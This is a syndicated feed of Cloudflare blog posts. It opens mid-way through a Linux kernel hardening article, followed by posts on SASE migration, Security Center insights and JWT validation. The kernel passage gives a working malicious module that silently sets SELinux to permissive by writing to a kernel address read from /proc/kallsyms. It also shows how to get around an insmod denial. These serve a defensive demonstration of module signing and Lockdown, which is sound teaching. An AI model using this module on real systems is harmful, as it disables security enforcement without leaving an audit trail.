#ifdef CONFIG_SECURITY_SELINUX_DISABLE
	bool disabled;
#endif
#ifdef CONFIG_SECURITY_SELINUX_DEVELOP
	bool enforcing;
#endif
	bool checkreqprot;
	bool initialized;
	bool policycap[__POLICYDB_CAP_MAX];

	struct page *status_page;
	struct mutex status_lock;

	struct selinux_avc *avc;
	struct selinux_policy __rcu *policy;
	struct mutex policy_mutex;
} __randomize_layout;

From the above, we can see that if the kernel configuration has CONFIG_SECURITY_SELINUX_DEVELOP enabled, the structure would have a boolean variable enforcing, which controls the enforcement status of SELinux at runtime. This is exactly what the above $ sudo getenforce command returns. We can double check that the Debian kernel indeed has the configuration option enabled:

ignat@dev:~$ grep CONFIG_SECURITY_SELINUX_DEVELOP /boot/config-`uname -r`
CONFIG_SECURITY_SELINUX_DEVELOP=y

Good! Now that we have a variable in the kernel, which is responsible for some security enforcement, we can try to attack it. One problem though is the __randomize_layout attribute: since CONFIG_SECURITY_SELINUX_DISABLE is actually not set for our Debian kernel, normally enforcing would be the first member of the struct. Thus if we know where the struct is, we immediately know the position of the enforcing flag. With __randomize_layout, during kernel compilation the compiler might place members at arbitrary positions within the struct, so it is harder to create generic exploits. But arbitrary struct randomization within the kernel may introduce performance impact, so is often disabled and it is disabled for the Debian kernel:

ignat@dev:~$ grep RANDSTRUCT /boot/config-`uname -r`
CONFIG_RANDSTRUCT_NONE=y

We can also confirm the compiled position of the enforcing flag using the pahole tool and either kernel debug symbols, if available, or (on modern kernels, if enabled) in-kernel BTF information. We will use the latter:

ignat@dev:~$ pahole -C selinux_state /sys/kernel/btf/vmlinux
struct selinux_state {
	bool                       enforcing;            /*     0     1 */
	bool                       checkreqprot;         /*     1     1 */
	bool                       initialized;          /*     2     1 */
	bool                       policycap[8];         /*     3     8 */

	/* XXX 5 bytes hole, try to pack */

	struct page *              status_page;          /*    16     8 */
	struct mutex               status_lock;          /*    24    32 */
	struct selinux_avc *       avc;                  /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	struct selinux_policy *    policy;               /*    64     8 */
	struct mutex               policy_mutex;         /*    72    32 */

	/* size: 104, cachelines: 2, members: 9 */
	/* sum members: 99, holes: 1, sum holes: 5 */
	/* last cacheline: 40 bytes */
};

So enforcing is indeed located at the start of the structure and we don’t even have to be a privileged user to confirm this.

Great! All we need is the runtime address of the selinux_state variable inside the kernel:
(shell/bash)

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffbc3bcae0 B selinux_state

With all the information, we can write an almost textbook simple kernel module to manipulate the SELinux state:

Mymod.c:

#include <linux/module.h>

static int __init mod_init(void)
{
	bool *selinux_enforce = (bool *)0xffffffffbc3bcae0;
	*selinux_enforce = false;
	return 0;
}

static void mod_fini(void)
{
}

module_init(mod_init);
module_exit(mod_fini);

MODULE_DESCRIPTION("A somewhat malicious module");
MODULE_AUTHOR("Ignat Korchagin <[email protected]>");
MODULE_LICENSE("GPL");

And the respective Kbuild file:

obj-m := mymod.o

With these two files we can build a full fledged kernel module according to the official kernel docs:

ignat@dev:~$ cd mymod/
ignat@dev:~/mymod$ ls
Kbuild  mymod.c
ignat@dev:~/mymod$ make -C /lib/modules/`uname -r`/build M=$PWD
make: Entering directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'
  CC [M]  /home/ignat/mymod/mymod.o
  MODPOST /home/ignat/mymod/Module.symvers
  CC [M]  /home/ignat/mymod/mymod.mod.o
  LD [M]  /home/ignat/mymod/mymod.ko
  BTF [M] /home/ignat/mymod/mymod.ko
Skipping BTF generation for /home/ignat/mymod/mymod.ko due to unavailability of vmlinux
make: Leaving directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'

If we try to load this module now, the system may not allow it due to the SELinux policy:

ignat@dev:~/mymod$ sudo insmod mymod.ko
insmod: ERROR: could not load module mymod.ko: Permission denied

We can workaround it by copying the module into the standard module path somewhere:

ignat@dev:~/mymod$ sudo cp mymod.ko /lib/modules/`uname -r`/kernel/crypto/

Now let’s try it out:

ignat@dev:~/mymod$ sudo getenforce
Enforcing
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
ignat@dev:~/mymod$ sudo getenforce
Permissive

Not only did we disable the SELinux protection via a malicious kernel module, we did it quietly. Normal sudo setenforce 0, even if allowed, would go through the official selinuxfs interface and would emit an audit message. Our code manipulated the kernel memory directly, so no one was alerted. This illustrates why uncontrolled kernel module loading is very dangerous and that is why most security standards and commercial security monitoring products advocate for close monitoring of kernel module loading.

But we don’t need to monitor kernel modules at Cloudflare. Let’s repeat the exercise on a Cloudflare production kernel (module recompilation skipped for brevity):

ignat@dev:~/mymod$ uname -a
Linux dev 6.6.17-cloudflare-2024.2.9 #1 SMP PREEMPT_DYNAMIC Mon Sep 27 00:00:00 UTC 2010 x86_64 GNU/Linux
ignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko
insmod: ERROR: could not insert module /lib/modules/6.6.17-cloudflare-2024.2.9/kernel/crypto/mymod.ko: Key was rejected by service

We get a Key was rejected by service error when trying to load a module, and the kernel log will have the following message:

ignat@dev:~/mymod$ sudo dmesg | tail -n 1
[41515.037031] Loading of unsigned module is rejected

This is because the Cloudflare kernel requires all the kernel modules to have a valid signature, so we don’t even have to worry about a malicious module being loaded at some point:

ignat@dev:~$ grep MODULE_SIG_FORCE /boot/config-`uname -r`
CONFIG_MODULE_SIG_FORCE=y

For completeness it is worth noting that the Debian stock kernel also supports module signatures, but does not enforce it:

ignat@dev:~$ grep MODULE_SIG /boot/config-6.1.0-18-cloud-amd64
CONFIG_MODULE_SIG_FORMAT=y
CONFIG_MODULE_SIG=y
# CONFIG_MODULE_SIG_FORCE is not set
…

The above configuration means that the kernel will validate a module signature, if available. But if not – the module will be loaded anyway with a warning message emitted and the kernel will be tainted.

Key management for kernel module signing

Signed kernel modules are great, but it creates a key management problem: to sign a module we need a signing keypair that is trusted by the kernel. The public key of the keypair is usually directly embedded into the kernel binary, so the kernel can easily use it to verify module signatures. The private key of the pair needs to be protected and secure, because if it is leaked, anyone could compile and sign a potentially malicious kernel module which would be accepted by our kernel.

But what is the best way to eliminate the risk of losing something? Not to have it in the first place! Luckily the kernel build system will generate a random keypair for module signing, if none is provided. At Cloudflare, we use that feature to sign all the kernel modules during the kernel compilation stage. When the compilation and signing is done though, instead of storing the key in a secure place, we just destroy the private key:

So with the above process:

The kernel build system generated a random keypair, compiles the kernel and modules
The public key is embedded into the kernel image, the private key is used to sign all the modules
The private key is destroyed

With this scheme not only do we not have to worry about module signing key management, we also use a different key for each kernel we release to production. So even if a particular build process is hijacked and the signing key is not destroyed and potentially leaked, the key will no longer be valid when a kernel update is released.

There are some flexibility downsides though, as we can’t “retrofit” a new kernel module for an already released kernel (for example, for a new piece of hardware we are adopting). However, it is not a practical limitation for us as we release kernels often (roughly every week) to keep up with a steady stream of bug fixes and vulnerability patches in the Linux Kernel.

KEXEC

KEXEC (or kexec_load()) is an interesting system call in Linux, which allows for one kernel to directly execute (or jump to) another kernel. The idea behind this is to switch/update/downgrade kernels faster without going through a full reboot cycle to minimize the potential system downtime. However, it was developed quite a while ago, when secure boot and system integrity was not quite a concern. Therefore its original design has security flaws and is known to be able to bypass secure boot and potentially compromise system integrity.

We can see the problems just based on the definition of the system call itself:

struct kexec_segment {
	const void *buf;
	size_t bufsz;
	const void *mem;
	size_t memsz;
};
...
long kexec_load(unsigned long entry, unsigned long nr_segments, struct kexec_segment *segments, unsigned long flags);

So the kernel expects just a collection of buffers with code to execute. Back in those days there was not much desire to do a lot of data parsing inside the kernel, so the idea was to parse the to-be-executed kernel image in user space and provide the kernel with only the data it needs. Also, to switch kernels live, we need an intermediate program which would take over while the old kernel is shutting down and the new kernel has not yet been executed. In the kexec world this program is called purgatory. Thus the problem is evident: we give the kernel a bunch of code and it will happily execute it at the highest privilege level. But instead of the original kernel or purgatory code, we can easily provide code similar to the one demonstrated earlier in this post, which disables SELinux (or does something else to the kernel).

At Cloudflare we have had kexec_load() disabled for some time now just because of this. The advantage of faster reboots with kexec comes with a (small) risk of improperly initialized hardware, so it was not worth using it even without the security concerns. However, kexec does provide one useful feature — it is the foundation of the Linux kernel crashdumping solution. In a nutshell, if a kernel crashes in production (due to a bug or some other error), a backup kernel (previously loaded with kexec) can take over, collect and save the memory dump for further investigation. This allows to more effectively investigate kernel and other issues in production, so it is a powerful tool to have.

Luckily, since the original problems with kexec were outlined, Linux developed an alternative secure interface for kexec: instead of buffers with code it expects file descriptors with the to-be-executed kernel image and initrd and does parsing inside the kernel. Thus, only a valid kernel image can be supplied. On top of this, we can configure and require kexec to ensure the provided images are properly signed, so only authorized code can be executed in the kexec scenario. A secure configuration for kexec looks something like this:

ignat@dev:~$ grep KEXEC /boot/config-`uname -r`
CONFIG_KEXEC_CORE=y
CONFIG_HAVE_IMA_KEXEC=y
# CONFIG_KEXEC is not set
CONFIG_KEXEC_FILE=y
CONFIG_KEXEC_SIG=y
CONFIG_KEXEC_SIG_FORCE=y
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…

Above we ensure that the legacy kexec_load() system call is disabled by disabling CONFIG_KEXEC, but still can configure Linux Kernel crashdumping via the new kexec_file_load() system call via CONFIG_KEXEC_FILE=y with enforced signature checks (CONFIG_KEXEC_SIG=y and CONFIG_KEXEC_SIG_FORCE=y).

Note that stock Debian kernel has the legacy kexec_load() system call enabled and does not enforce signature checks for kexec_file_load() (similar to module signature checks):

ignat@dev:~$ grep KEXEC /boot/config-6.1.0-18-cloud-amd64
CONFIG_KEXEC=y
CONFIG_KEXEC_FILE=y
CONFIG_ARCH_HAS_KEXEC_PURGATORY=y
CONFIG_KEXEC_SIG=y
# CONFIG_KEXEC_SIG_FORCE is not set
CONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y
…

Kernel Address Space Layout Randomization (KASLR)

Even on the stock Debian kernel if you try to repeat the exercise we described in the “Secure boot” section of this post after a system reboot, you will likely see it would fail to disable SELinux now. This is because we hardcoded the kernel address of the selinux_state structure in our malicious kernel module, but the address changed now:

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state

Kernel Address Space Layout Randomization (or KASLR) is a simple concept: it slightly and randomly shifts the kernel code and data on each boot:

This is to combat targeted exploitation (like the malicious module in this post) based on the knowledge of the location of internal kernel structures and code. It is especially useful for popular Linux distribution kernels, like the Debian one, because most users use the same binary and anyone can download the debug symbols and the System.map file with all the addresses of the kernel internals. Just to note: it will not prevent the module loading and doing harm, but it will likely not achieve the targeted effect of disabling SELinux. Instead, it will modify a random piece of kernel memory potentially causing the kernel to crash.

Both the Cloudflare kernel and the Debian one have this feature enabled:

ignat@dev:~$ grep RANDOMIZE_BASE /boot/config-`uname -r`
CONFIG_RANDOMIZE_BASE=y

Restricted kernel pointers

While KASLR helps with targeted exploits, it is quite easy to bypass since everything is shifted by a single random offset as shown on the diagram above. Thus if the attacker knows at least one runtime kernel address, they can recover this offset by subtracting the runtime address from the compile time address of the same symbol (function or data structure) from the kernel’s System.map file. Once they know the offset, they can recover the addresses of all other symbols by adjusting them by this offset.

Therefore, modern kernels take precautions not to leak kernel addresses at least to unprivileged users. One of the main tunables for this is the kptr_restrict sysctl. It is a good idea to set it at least to 1 to not allow regular users to see kernel pointers:
(shell/bash)

ignat@dev:~$ sudo sysctl -w kernel.kptr_restrict=1
kernel.kptr_restrict = 1
ignat@dev:~$ grep selinux_state /proc/kallsyms
0000000000000000 B selinux_state

Privileged users can still see the pointers:

ignat@dev:~$ sudo grep selinux_state /proc/kallsyms
ffffffffb41bcae0 B selinux_state

Similar to kptr_restrict sysctl there is also dmesg_restrict, which if set, would prevent regular users from reading the kernel log (which may also leak kernel pointers via its messages). While you need to explicitly set kptr_restrict sysctl to a non-zero value on each boot (or use some system sysctl configuration utility, like this one), you can configure dmesg_restrict initial value via the CONFIG_SECURITY_DMESG_RESTRICT kernel configuration option. Both the Cloudflare kernel and the Debian one enforce dmesg_restrict this way:

ignat@dev:~$ grep CONFIG_SECURITY_DMESG_RESTRICT /boot/config-`uname -r`
CONFIG_SECURITY_DMESG_RESTRICT=y

Worth noting that /proc/kallsyms and the kernel log are not the only sources of potential kernel pointer leaks. There is a lot of legacy in the Linux kernel and [new sources are continuously being found and patched]. That’s why it is very important to stay up to date with the latest kernel bugfix releases.

Lockdown LSM

Linux Security Modules (LSM) is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux Kernel. We have [covered our usage of another LSM module, BPF-LSM, previously].

BPF-LSM is a useful foundational piece for our kernel security, but in this post we want to mention another useful LSM module we use — the Lockdown LSM. Lockdown can be in three states (controlled by the /sys/kernel/security/lockdown special file):

ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality

none is the state where nothing is enforced and the module is effectively disabled. When Lockdown is in the integrity state, the kernel tries to prevent any operation, which may compromise its integrity. We already covered some examples of these in this post: loading unsigned modules and executing unsigned code via KEXEC. But there are other potential ways (which are mentioned in the LSM’s man page), all of which this LSM tries to block. confidentiality is the most restrictive mode, where Lockdown will also try to prevent any information leakage from the kernel. In practice this may be too restrictive for server workloads as it blocks all runtime debugging capabilities, like perf or eBPF.

Let’s see the Lockdown LSM in action. On a barebones Debian system the initial state is none meaning nothing is locked down:

ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ cat /sys/kernel/security/lockdown
[none] integrity confidentiality

We can switch the system into the integrity mode:

ignat@dev:~$ echo integrity | sudo tee /sys/kernel/security/lockdown
integrity
ignat@dev:~$ cat /sys/kernel/security/lockdown
none [integrity] confidentiality

It is worth noting that we can only put the system into a more restrictive state, but not back. That is, once in integrity mode we can only switch to confidentiality mode, but not back to none:

ignat@dev:~$ echo none | sudo tee /sys/kernel/security/lockdown
none
tee: /sys/kernel/security/lockdown: Operation not permitted

Now we can see that even on a stock Debian kernel, which as we discovered above, does not enforce module signatures by default, we cannot load a potentially malicious unsigned kernel module anymore:

ignat@dev:~$ sudo insmod mymod/mymod.ko
insmod: ERROR: could not insert module mymod/mymod.ko: Operation not permitted

And the kernel log will helpfully point out that this is due to Lockdown LSM:

ignat@dev:~$ sudo dmesg | tail -n 1
[21728.820129] Lockdown: insmod: unsigned module loading is restricted; see man kernel_lockdown.7

As we can see, Lockdown LSM helps to tighten the security of a kernel, which otherwise may not have other enforcing bits enabled, like the stock Debian one.

If you compile your own kernel, you can go one step further and set the initial state of the Lockdown LSM to be more restrictive than none from the start. This is exactly what we did for the Cloudflare production kernel:

ignat@dev:~$ grep LOCK_DOWN /boot/config-6.6.17-cloudflare-2024.2.9
# CONFIG_LOCK_DOWN_KERNEL_FORCE_NONE is not set
CONFIG_LOCK_DOWN_KERNEL_FORCE_INTEGRITY=y
# CONFIG_LOCK_DOWN_KERNEL_FORCE_CONFIDENTIALITY is not set

Conclusion

In this post we reviewed some useful Linux kernel security configuration options we use at Cloudflare. This is only a small subset, and there are many more available and even more are being constantly developed, reviewed, and improved by the Linux kernel community. We hope that this post will shed some light on these security features and that, if you haven’t already, you may consider enabling them in your Linux systems.

Watch on Cloudflare TV

Tune in for more news, announcements and thought-provoking discussions! Don’t miss the full Security Week hub page.

Cloudflare treats SASE anxiety for VeloCloud customers

2024-03-06 Brian Tokuyoshi

Post Syndicated from Brian Tokuyoshi original https://blog.cloudflare.com/treating-sase-anxiety

We understand that your VeloCloud deployment may be partially or even fully deployed. You may be experiencing discomfort from SASE anxiety. Symptoms include:

Sudden vendor whiplash – Over the past 5 years, the ownership and strategic direction of VeloCloud has undergone a series of dramatic changes. VeloCloud was acquired by VMware in 2017, then VMware was spun off from Dell EMC in 2021, and in 2023 Broadcom completed its acquisition of VMware and VeloCloud.
Dizziness from product names – VeloCloud helpfully published a list of some of its previous product names, which include VeloCloud, Velo, Velo SD-WAN, VeloCloud SD-WAN, and VMware SD-WAN by VeloCloud. But the list also misses other names such as “VMware NSX SD-WAN by VeloCloud” as well. Recently, VMware announced yet another name change by renaming VMware SD-WAN to VMware VeloCloud SD-WAN, and renamed VMware SASE to VMware VeloCloud SASE, secured by Symantec.
Irregular priorities and strategies – With the number of times that VMware reorganized its various networking and security products into different business units, it’s now about to embark on yet another as Broadcom pursues single vendor SASE.

If you’re a VeloCloud customer, we are here to help you with your transition to Magic WAN, with planning, products and services. You’ve experienced the turbulence, and that’s why we are taking steps to help. First, it’s necessary to illustrate what’s fundamentally wrong with the architecture by acquisition model in order to define the right path forward. Second, we document the steps involved for making a transition from VeloCloud to Cloudflare. Third, we are offering a helping hand to help VeloCloud customers to get their SASE strategies back on track.

Architecture is the key to SASE

Your IT organization must deliver stability across your information systems, because the future of your business depends on the decisions that you make today. You need to make sure that your SASE journey is backed by vendors that you can depend on. Indecisive vendors and unclear strategies rarely inspire confidence, and it’s driving organizations to reconsider their relationship.

It’s not just VeloCloud that’s pivoting. Many vendors are chasing the brass ring to meet the requirement for Single Vendor SASE, and they’re trying to reduce their time to market by acquiring features on their checklist, rather than taking the time to build the right architecture for consistent management and user experience. It’s led to rapid consolidation of both startups and larger product stacks, but now we’re seeing many many instances of vendors having to rationalize their overlapping product lines. Strange days indeed.

But the thing is, Single Vendor SASE is not a feature checklist game. It’s not like shopping for PC antivirus software where the most attractive option was the one with the most checkboxes. It doesn’t matter if you acquire a large stack of product acronyms (ZTNA, SD-WAN, SWG, CASB, DLP, FWaaS, SD-WAN to name but a few) if the results are just as convoluted as the technology it aims to replace.

If organizations are new to SASE, then it can be difficult to know what to look for. However, one clear sign of trouble is taking an SSE designed by one vendor and combining it with SD-WAN from another. Because you can’t get a converged platform out of two fundamentally incongruent technologies.

Why SASE Math Doesn’t Work

The conceptual model for SASE typically illustrates two half circles, with one consisting of cloud-delivered networking and the other being cloud-delivered security. With this picture in mind, it’s easy to see how one might think that combining an implementation of cloud-delivered networking (VeloCloud SD-WAN) and an implementation of cloud-delivered security (Symantec Network Protection – SSE) might satisfy the requirements. Does Single Vendor SASE = SD-WAN + SSE?

In practice, networking and network security do not exist in separate universes, but SD-WAN and SSE implementations do, especially when they were designed by different vendors. That’s why the math doesn’t work, because even with the requisite SASE functionality, the implementation of the functionality doesn’t fit. SD-WAN is designed for network connectivity between sites over the SD-WAN fabric, whereas SSE largely focuses on the enforcement of security policy for user->application traffic from remote users or traffic leaving (rather than traversing) the SD-WAN fabric. Therefore, to bring these two worlds together, you end up with security inconsistency, proxy chains which create a burden on latency, or implementing security at the edge rather than in the cloud.

Why Cloudflare is different

At Cloudflare, the basis for our approach to single vendor SASE starts from building a global network designed with private data centers, overprovisioned network and compute capacity, and a private backbone designed to deliver our customer’s traffic to any destination. It’s what we call any-to-any connectivity. It’s not using the public cloud for SASE services, because the public cloud was designed as a destination for traffic rather than being optimized for transit. We are in full control of the design of our data centers and network and we’re obsessed with making it even better every day.

It’s from this network that we deliver networking and security services. Conceptually, we implement a philosophy of composability, where the fundamental network connection between the customer’s site and the Cloudflare data center remains the same across different use cases. In practice, and unlike traditional approaches, it means no downtime for service insertion when you need more functionality — the connection to Cloudflare remains the same. It’s the services and the onboarding of additional destinations that changes as organizations expand their use of Cloudflare.

From the perspective of branch connectivity, use Magic WAN for the connectivity that ties your business together, no matter which way traffic passes. That’s because we don’t treat the directions of your network traffic as independent problems. We solve for consistency by on-ramping all traffic through one of Cloudflare’s 310+ anycasted data centers (whether inbound, outbound, or east-west) for enforcement of security policy. We solve for latency by eliminating the need to forward traffic to a compute location by providing full compute services in every data center. We implement SASE using a light edge / heavy cloud model, with services delivered within the Cloudflare connectivity cloud rather than on-prem.

How to transition from VeloCloud to Cloudflare

Start by contacting us to get a consultation session with our solutions architecture team. Our architects specialize in network modernization and can map your SASE goals across a series of smaller projects. We’ve worked with hundreds of organizations to achieve their SASE goals with the Cloudflare connectivity cloud and can build a plan that your team can execute on.

For product education, join one of our product workshops on Magic WAN to get a deep dive into how it’s built and how it can be rolled out to your locations. Magic WAN uses a light edge, heavy cloud model that has multiple network insertion models (whether a tunnel from an existing device, using our turnkey Magic WAN Connector, or deploying a virtual appliance) which can work in parallel or as a replacement for your branch connectivity needs, thus allowing you to migrate at your pace. Our specialist teams can help you mitigate transitionary hardware and license costs as you phase out VeloCloud and accelerate your rollout of Magic WAN.

The Magic WAN technical engineers have a number of resources to help you build product knowledge as well. This includes reference architectures and quick start guides that address your organization’s connectivity goals, whether sizing down your on-prem network in favor of the emerging “coffee shop networking” philosophy, retiring legacy SD-WAN, and full replacement of conventional MPLS.

For services, our customer success teams are ready to support your transition, with services that are tailored specifically for Magic WAN migrations both large and small.

Your next move

Interested in learning more? Contact us to get started, and we’ll help you with your SASE journey. Contact us to learn how to replace VeloCloud with Cloudflare Magic WAN and use our network as an extension of yours.

Secure your unprotected assets with Security Center: quick view for CISOs

2024-03-05 Alexandra Moraru

Post Syndicated from Alexandra Moraru original https://blog.cloudflare.com/security-insights-quick-ciso-view

We understand that one of the significant hurdles faced by our customers, especially larger organizations, is obtaining a clear view of the deployment of Cloudflare services throughout their vast and complex infrastructures. The question isn’t just whether Cloudflare is deployed, but whether it’s fully optimized across every asset and service. Addressing this challenge head-on, we’re rolling out a new feature set designed to provide better visibility and control over your security posture.

The problem we are addressing

The core problem we’re tackling is the growing complexity of cyber threats and the expanding attack surface, which complicates maintaining a strong security posture for our customers.

It’s not uncommon for organizations to deploy a variety of security solutions, including ours, without fully optimizing and implementing their configurations. This results in a false sense of security, underutilized investments and, more critically, exposed vulnerabilities. Our customers frequently express concerns about not having a clear picture of their security posture across their entire infrastructure, uncertain if critical assets are adequately protected or if specific Cloudflare security features could be better leveraged.

We want to bring users comprehensive visibility into their security configurations and the state of their deployments across Cloudflare’s suite of products. By providing actionable insights into underconfigured areas, unassigned resources, or unutilized features, we aim to close the security gaps and enhance the overall defense mechanisms of our customers’ digital ecosystems. This improvement is not just about leveraging technology but about promoting a culture of proactive security management, where every piece of the digital infrastructure is consistently and optimally protected.

How we’re solving this inside Security Center

More than two years ago, we took on the mission to consolidate our extensive suite of security products, security expertise, and our unique insights into Internet threats into one comprehensive solution — the Cloudflare Security Center. Launched with the vision to simplify attack surface management and make advanced security intelligence actionable for organizations of all sizes, Security Center has since become the one-stop quick view to evaluate your security posture.

Today, we build on this foundation to address a pain point for many of our large customers: ensuring complete Cloudflare protection across their entire digital infrastructure.

Our latest update in the Security Center focuses on delivering detailed insights into Cloudflare’s deployment status across your digital assets. This encompasses identifying applications where critical services like WAF, Access, and other security protection tools might not be fully configured or optimized, thereby weakening your security posture.

In addition to these insights, we are introducing a quick view within Security Center Insights, designed to offer CISOs and security teams a quick and comprehensive view of their current Cloudflare product configurations at any given moment, along with recommendations for enhancements, under the Security optimization snapshot on the dashboard.

Leveraging these new insights, Cloudflare users can now take proactive steps to close any gaps in their security framework. By offering a granular view of where specific Cloudflare services can be better utilized, we’re not just solving a visibility problem — we’re delivering actionable security intelligence. This means decisions can be made swiftly, ensuring that your defenses not only keep pace with, but stay ahead of, potential threats.

For instance, we’ll highlight if WAF is deployed on only a portion of your zones, where Email Security could be leveraged, or if certain assets are unprotected by Access controls. We’re also making it easier for you to see if you are missing any critical setup like Page Shield, ensuring the product is configured, so you are not just one step closer to becoming compliant with standards like PCI DSS, but are also protected against evolving threats. We are outlining newly discovered API endpoints that require your attention as well.

Finally, users can now export their Security Insights using our public API, and will soon be able to do the same directly from the Cloudflare Dashboard, with a simple click of a button!

Accessing Security Center Insights

Security Center Insights is available to all Cloudflare dashboard users that are Administrators of their Cloudflare account.

Regardless of the size or scope of your deployment, our goal is to empower every user with the tools needed to achieve a robust security posture, which they can continuously influence by improving existing configurations, adding new solutions, and discovering new vulnerabilities.

Future Security Center roadmap

We’re constantly adding other relevant security insights to help improve your security posture, covering exposed infrastructure, insecure configurations, optimisations, new products, and more, including the ability to easily export these for reporting purposes. Moreover, stay tuned for a completely new reporting platform that will automatically deliver curated and contextualized security insights directly into your inbox — showcasing the power of Cloudflare’s security portfolio. The periodic reports will be complemented by a personalized interactive in-dashboard reporting experience.

Check out your security insights under your account’s Security Center now and take action to improve your security posture with Cloudflare!

If you would like to join us in building the Security Center or other exciting Cloudflare products, see our open positions and learn more about life@Cloudflare.

Protecting APIs with JWT Validation

2024-03-05 John Cosgrove

Post Syndicated from John Cosgrove original https://blog.cloudflare.com/protecting-apis-with-jwt-validation

Today, we are happy to announce that Cloudflare customers can protect their APIs from broken authentication attacks by validating incoming JSON Web Tokens (JWTs) with API Gateway. Developers and their security teams need to control who can communicate with their APIs. Using API Gateway’s JWT Validation, Cloudflare customers can ensure that their Identity Provider previously validated the user sending the request, and that the user’s authentication tokens have not expired or been tampered with.

What’s new in this release?

After our beta release in early 2023, we continued to gather feedback from customers on what they needed from JWT validation in API Gateway. We uncovered four main feature requests and shipped updates in this GA release to address them all:

Old, Beta limitation	New, GA release capability
Only supported validating the raw JWT	Support for the Bearer token format
Only supported one JWKS configuration	Create up to four different JWKS configs to support different environments per zone
Only supported validating JWTs sent in HTTP headers	Validate JWTs if they are sent in a cookie, not just an HTTP header
JWT validation ran on all requests to the entire zone	Exclude any number of managed endpoints in a JWT validation rule

What is the threat?

Broken authentication is the #1 threat on the OWASP Top 10 and the #2 threat on the OWASP API Top 10. We’ve written before about how flaws in API authentication and authorization at Optus led to a threat actor offering 10 million user records for sale, and government agencies have warned about these exact API attacks.

According to Gartner®¹, “attacks and data breaches involving poorly secured application programming interfaces (APIs) are occurring frequently.” Getting authentication correct for your API users can be challenging, but there are best practices you can employ to cover your bases. JSON Web Token Validation in API Gateway fulfills one of these best practices by enforcing a positive security model for your authenticated API users.

A primer on authentication and authorization

Authentication establishes identity. Imagine you’re collaborating with multiple colleagues and writing a document in Google Docs. When you’re all authors of the document, you have the same privileges, and you can overwrite each other’s text. You can all see each other’s name next to your respective cursor while you’re typing. You’re all authenticated to Google Docs, so Docs can show all the users on a document who everyone is.

Authorization establishes ownership or permissions to objects. Imagine you’re collaborating with your colleague in Docs again, but this time they’ve written a document ahead of time and simply wish for you to review it and add comments without changing the document. As the owner of the document, your colleague sets an authorization policy to only allow you ‘comment’ access. As such, you cannot change their writing at all, but you can still view the document and leave comments.

While the words themselves might sound similar, the differences between them are hugely important for security. It’s not enough to simply check that a user logging in has the correct login credentials (authentication). If you never check their permissions (authorization), they would be free to overwrite, add, or delete other users’ content. When this happens for APIs, OWASP calls it a Broken Object Level Authorization attack.

A primer on API access tokens

Users authenticate to services in many different ways on the web today. Let’s take a look at the history of authentication with username and password authentication, API key authentication, and JWT authentication before we mention how JWTs can help stop API attacks.

In the early days, the web used HTTP Basic Authentication, where browsers transmitted username and password pairs as an HTTP header, posing significant security risks and making credentials visible to any observer when the application failed to adopt SSL/TLS certificates. Basic authentication also complicated API access, requiring hard-coded credentials and potentially giving broad authorization policies to a single user.

The introduction of API access keys improved security by detaching authentication from user credentials and instead sending secret text strings along with requests. This approach allowed for more nuanced access control by key instead of by user ID, though API keys still faced risks from man-in-the-middle attacks and problematic storage of secrets in source code.

JSON Web Tokens (JWTs) address these issues by removing the need to send long-lived secrets on every request, introducing cryptographically verifiable, auto-expiring, short-lived sessions. Think of a JWT like a tamper-evident seal on a bottle of medication. Along with the seal, medication also has an expiration date printed on it. Users notice when the seal is tampered with or missing altogether, and when the medication expires.

These attributes enhance security any time a JWT is used instead of a long-lived shared secret. JWTs are not an end-all-be-all solution, but they do represent an evolution in authentication technology and are widely used for authentication and authorization on the Internet today.

What’s the structure of a JWT?

JWTs are composed of three fields separated by periods. The first field is a header, the second a payload, and the third a signature:

eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJNeURlbW9JRFAiLCJzdWIiOiJqb2huZG9lIiwiYXVkIjoiTXlBcHAiLCJpYXQiOjE3MDg5ODU2MDEsImV4cCI6MTcwODk4NjIwMSwiY2xhc3MiOiJhZG1pbiJ9.v0nywcQemlEU4A18QD9UTgJLyH4ZPXppuW-n0iOmtj4x-hWJuExlMKeNS-vMZt4K6n0pDCFIAKo7_VZqACx4gILXObXMU4MEleFoKKd0f58KscNrC3BQqs3Gnq-vb5Ut9CmcvevQ5h9cBCI4XhpP2_LkYcZiuoSd3zAm2W_0LNZuFXp1wo8swDoKETYmtrdTjuF-IlVjLDAxNsWm2e7T5A8HmCnAWRItEPedm_8XVJAOemx_KqIH5w6zHY1U-M6PJkHK6D2gDU5eiN35A4FCrC5bQ1-0HSTtJkLIed2-1mRO1oANWHpscvpNLQBWQLLiIZ_evbcq_tnwh1X1sA3uxQ

If we base64 decode the first two sections, we arrive at the following structure (comments added for clarity):

{
  "alg": "RS256",     // JWT signature algorithm
  "typ": "JWT"        // JWT type
}

{
  "iss": "MyDemoIDP", // Which identity provider issued this JWT
  "sub": "johndoe",   // Which user this JWT identifies
  "aud": "MyApp",     // Which app this JWT is destined for
  "iat": 1708985601,  // When this JWT was issued
  "exp": 1709986201,  // When this JWT expires
  "class": "admin"    // Extra, customer-defined metadata
}

We can then use the algorithm mentioned in the header (RS256) as well as the Identity Provider’s public key (example below) to check the last segment in the JWT, the signature (code not shown).

The signature is what makes a JWT special. The token issuer, taking into account the claims, generates a signature based on a private secret or a public/private key pair. The public key can be published online, allowing anyone to check if a JWT was legitimately issued by an organization.

Proper authentication and authorization stop API attacks

